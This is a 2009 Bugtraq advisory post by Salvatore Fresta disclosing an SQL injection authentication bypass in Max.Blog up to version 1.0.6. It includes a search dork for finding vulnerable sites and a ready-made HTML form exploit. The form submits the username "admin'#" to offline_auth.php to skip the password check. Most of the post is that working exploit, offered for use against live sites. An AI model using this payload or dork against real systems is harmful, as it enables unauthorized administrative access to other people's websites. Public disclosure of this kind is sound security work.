Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass

From: Salvatore "drosophila" Fresta <drosophilaxxx@gmail.com>
To: Bugtraq <bugtraq@securityfocus.com>
Cc:
Subject: Max.Blog <= 1.0.6 (offline_auth.php) Offline Authentication Bypass
Date:


###################             Salvatore "drosophila" Fresta  ###################


Application: Max.Blog
                           http://www.mzbservices.com
Version:         Max.Blog <= 1.0.6
Bug:                 * Offline Authentication Bypass
Exploitation:       Remote
Dork:                        intext:"Powered by Max.Blog"
Date:                27 Jan 2009
Discovered by:  Salvatore "drosophila" Fresta
Author:             Salvatore "drosophila" Fresta
                    e-mail: drosophilaxxx@gmail.com
                    

############################################################################

- BUGS

Offline Authentication Bypass Exploit:

        Requisites: magic quotes = off

        File affected: offline_auth.php

       This bug allows a guest to bypass an offline authentication service
        using SQL Injection vulnerability.

############################################################################

- CODE

<html>
 <head>
           <title>
                  Salvatore "drosophila" Fresta - Max.Blog <= 1.0.6 Offline
Authentication Bypass Exploit
         </title>
 </head>
  <body>
           <form action="http://www.site.com/path/offline_auth.php" method="POST">
                      <input type="text" name="username" value="admin'#" size="15">
                       <input type="hidden" name="password">
                        <input type="submit" value="Go!">
            </form>
  </body>
</html>

############################################################################

-- 
Salvatore "drosophila" Fresta
CWNP444351





Copyright © 1995-2019 LinuxRocket.net. All rights reserved.